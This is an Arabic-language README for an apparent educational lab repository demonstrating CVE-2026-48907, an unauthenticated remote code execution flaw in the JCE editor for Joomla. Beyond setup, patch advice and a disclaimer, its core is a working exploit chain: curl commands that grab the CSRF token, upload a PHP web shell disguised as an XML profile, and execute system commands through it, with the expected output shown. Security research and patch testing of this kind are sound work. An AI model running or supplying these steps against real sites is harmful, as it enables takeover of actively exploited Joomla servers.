
POC لـ CVE-2026-48907
PSsec مختبر أبحاث أمنية تعليمي لثغرة CVE-2026-48907.
CVE-2026-48907 هي ثغرة حرجة (بدرجة CVSS 10.0) في تنفيذ الأكواد عن بُعد بدون مصادقة في JCE (محرر محتوى Joomla)، وهي إضافة المحرر الأكثر تثبيتًا لـ Joomla، وتؤثر على جميع الإصدارات ≤ 2.9.99.4.
تقبل نقطة النهاية profiles.import رفع الملفات بدون أي مصادقة. يمكن للمهاجم رفع ملف PHP خبيث مُقنّع كملف تعريف XML، والذي يُكتب في دليل tmp/ على الخادم ويُتنفَّذ مباشرة عبر HTTP — بدون الحاجة إلى أي بيانات اعتماد.
| التفاصيل | القيمة |
|---|---|
| CVE | CVE-2026-48907 |
| درجة CVSS | 10.0 حرجة |
| الإصدارات المتأثرة | JCE ≤ 2.9.99.4 |
| الإصدارات المُصححة | JCE ≥ 2.9.99.5 |
| مدرج في CISA KEV | نعم — 16 يونيو 2026 |
| يُستغل بنشاط | نعم |
docker compose up -d
افتح http://localhost:8080 في متصفحك وأكمل معالج الإعداد باستخدام بيانات الاعتماد التالية:
| الحقل | القيمة |
|---|---|
| مضيف قاعدة البيانات | db |
| اسم قاعدة البيانات | joomla |
| مستخدم قاعدة البيانات | joomla |
wget https://github.com/widgetfactory/jce/releases/download/2.9.99.4/pkg_jce_29994.zip
ثم في لوحة إدارة Joomla ← النظام ← الإضافات ← التثبيت ← ارفع ملف ZIP.
URL=http://localhost:8080
TOKEN=$(curl -s -c cookies.txt "$URL/" \
| sed -n 's/.*"csrf\.token"[[:space:]]*:[[:space:]]*"\([a-f0-9]\{32\}\)".*/\1/p; s/.*name="\([a-f0-9]\{32\}\)"[^>]*value="1".*/\1/p' \
| head -n1)
curl -i -s -b cookies.txt -c cookies.txt \
-F "[email protected];type=application/xml" \
-F "task=profiles.import" \
-F "${TOKEN}=1" \
"$URL/index.php?option=com_jce"
curl -i -s -b cookies.txt -c cookies.txt \
"$URL/tmp/shell.xml.php?cmd=id"
الإخراج المتوقع: uid=33(www-data) gid=33(www-data)
| الملف | الوصف |
|---|---|
docker-compose.yml | يُشغّل بيئة Joomla 5.3.1 + MySQL 8.0 القابلة للاستغلال |
shell.xml.php | حمولة قشرة ويب PHP بسيطة |
instructions.txt | ملاحظات الاستغلال خطوة بخطوة |
قم بتحديث JCE إلى الإصدار 2.9.99.5 أو أحدث فورًا.
إشعار البائع الرسمي والتصحيح المجاني لإصدارات Joomla الأقدم: تحديث أمني لـ JCE — joomlacontenteditor.net
هذا المستودع مخصص حصريًا للأغراض التعليمية وأبحاث الأمن المصرح بها.
يجب إجراء الاختبارات فقط ضد الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها. الاستخدام غير المصرح به لهذه المواد ضد أنظمة لا تملكها غير قانوني وغير أخلاقي. لا يتحمل المؤلفون وPansophical OU أي مسؤولية عن إساءة استخدام هذا المحتوى.
هذه البيئة المعملية قابلة للاستغلال عمدًا. لا تعرّضها للإنترنت أو لأي شبكة غير موثوقة.
بواسطة PSsec
| كلمة مرور قاعدة البيانات | joomlapass |